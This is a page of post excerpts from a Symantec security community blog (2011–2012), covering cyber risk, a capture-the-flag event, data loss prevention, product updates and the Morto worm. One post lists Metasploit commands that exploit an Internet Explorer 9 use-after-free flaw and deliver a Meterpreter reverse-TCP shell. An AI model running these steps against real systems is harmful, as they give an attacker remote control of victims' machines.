Security Community Blog
Showing posts tagged with Symantec Security Information Manager
Showing posts in English
James Hanlon | 15 Oct 2012 | 0 comments

Cyberspace presents an incredible amount of opportunity for today’s organisations. Connectivity, innovation, productivity and collaboration are just some of the benefits on offer. However, cyberspace presents equally significant risks. Those risks can have huge impact and visibility; it seems that a week cannot go by without another cyber incident being splashed across internet feeds, newspapers and websites. This visibility means that cyber risks have the attention of the executive management of every organisation.

Cyber risks include targeted attacks, advanced persistent threats, data loss, denial-of-service attacks, hacktivism, negligent and malicious insiders, reputational damage, cyber espionage and nation state threats. In 2011, Symantec blocked over 5.5 billion malware attacks, an 81% increase over the previous year, witnessed a 36% increase in web-based attacks and an increased focus and intensity of advanced persistent malware. Furthermore, Symantec...

Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We have a vulnerability in IE 9, discovered on 17/09/2012, which can be exploited with the following commands in Backtrack 5 R2:

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Elspeth Magoria | 06 Sep 2012 | 0 comments

Join Symantec and Washington University at the St. Louis Symantec $25k Cyber Security Challenge. This one-of-a-kind event invites security professionals and ethical hackers like yourself to help further improve current security technologies and solutions.

Come learn about the current global threat landscape and IT trends requiring organizations to take new approaches in security – cloud, mobility, compliance, etc.

Stay for the "Challenge", an exciting cyber "Capture the Flag" (CTF) simulation. Take part for a chance to win cash and prizes! And don't miss the Hands-On Security Demo Lab that will showcase current security solutions around mobile, data loss, encryption, email and web security and more.

Be There To Win - All registered attendees get a $50 Amazon.com Gift Card and if you refer two friends and they attend...

Jhildy11 Xcend Group | 14 Aug 2012 | 0 comments

In case you missed it, see the archived version of last week's webinar "Learn How to Protect Even Your Hardest-to-Find IP with Intelligent Data Loss Prevention"

 

 

With the average cost of a breach now topping an incomprehensible $7 million, more and more organizations are looking to Data Loss Prevention solutions to protect their highest value data. Join XCEND, a Platinum Symantec partner and DLP Master Specialist, to learn how you can accurately detect and protect all types of confidential data wherever it is stored or used.  (54 min)
 
Here's the Link to see the Archived Version: https://www2.gotomeeting.com/register/430279362 or go to our website at www.xcendgroup.com  to...

Milan_T | 18 May 2012 | 1 comment

Security rule requirements may vary with respect to time. A rule implemented once needs to be modified or changed, or must be reviewed periodically.

If any new requirements come into the picture, the rules must be reviewed. I have SSIM in my organisation, implemented a few years ago, and the rules have stayed as they were. Now security purposes and an engineering approach are needed to update it, so older rules must be updated accordingly, and if necessary new ones must be added to provide better services.

Deb Banerjee | 17 Feb 2012 | 0 comments

Traditionally information security has been reasoned in terms of assets, vulnerabilities and threats. A mature info-sec program has visibility into its critical assets, a compliance program for reducing its attack surfaces and the vulnerabilities therein, and for detecting and blocking threats. A rich set of patterns and practices has emerged in supporting these for the physical (and static) data center. These include segmentation as a key practice for isolating higher-trust workloads (e.g. PCI) from lower-trust workloads (e.g. test, VDI). Another important aspect is change control that surfaces through multi-step provisioning cycles and change management processes. While these practices are important to ensuring compliance and minimizing attack surfaces, they have impacted IT's ability to respond to changing business requirements. For example, physically segmented workloads create challenges in resource utilization e.g. ...

GrahamA | 11 Jan 2012 | 1 comment

Happy new year to you all!

The Symantec LUA team released version 2.3.1 in Dec. Just a quick status update for you in relation to how things have been going since then.

We've seen over 200 successful customer installs/upgrades of LUA 2.3.1 so far and feedback has been very positive.

As a recap, 2.3.1 introduced the following enhancements:

  • The LUA web server service will now automatically restart if it crashes or terminates unexpectedly.
  • LUA will now automatically install and utilise an optimised private Java Runtime Environment (version 1.6 update 27). This also means it is no longer necessary to separately install a public JRE for use by LUA.
  • It is now possible for LUA to automatically run multiple specified distribution tasks after a download task completes.
  • New quick link added to the user interface which allows customers to quickly and easily capture all LUA-related troubleshooting...

Pamela Reese | 09 Nov 2011 | 3 comments

Symantec received a finalist nomination in 12 categories of the upcoming SC Magazine 2012 Awards, representing Symantec's broad portfolio of superior security offerings. SC Magazine will announce the winners at a dinner event during RSA 2012. Symantec looks forward to attending!

Best Anti-Malware Gateway (Symantec Web Gateway 5.0)

Best Cloud Computing Security (Symantec Endpoint Protection.cloud)

Best Data Leakage Prevention (DLP) (Symantec Data Loss Prevention)

...

Tariq Naik | 06 Oct 2011 | 0 comments

IBM and Intel's security arm, McAfee, have bought themselves SIEM capabilities, with IBM buying Q1 Labs and McAfee purchasing NitroSecurity. This follows HP's acquisition of ArcSight last year.

Brandon Noble | 01 Sep 2011 | 0 comments

Over the weekend, Microsoft and F-Secure issued warnings about a new global threat called “Morto”, and the Internet Storm Center has been seeing a large spike in traffic on port 3389.

The spike looks to have been caused by the RDP (Remote Desktop) portion of the worm calling around looking for RDP connections. Once it finds one, it uses a small list of weak passwords and ... pwnage ensues.

Symantec detects this threat as W32.Morto, and Security Response will continue to perform deeper analysis throughout the next several days. So far, they have uncovered several dozen different MD5s that are all part of this same threat family.

 

Signs of Morto in your environment

As we learned with W32.Downadup:
Brute force attacks + Small list of passwords = Account lockouts.

As...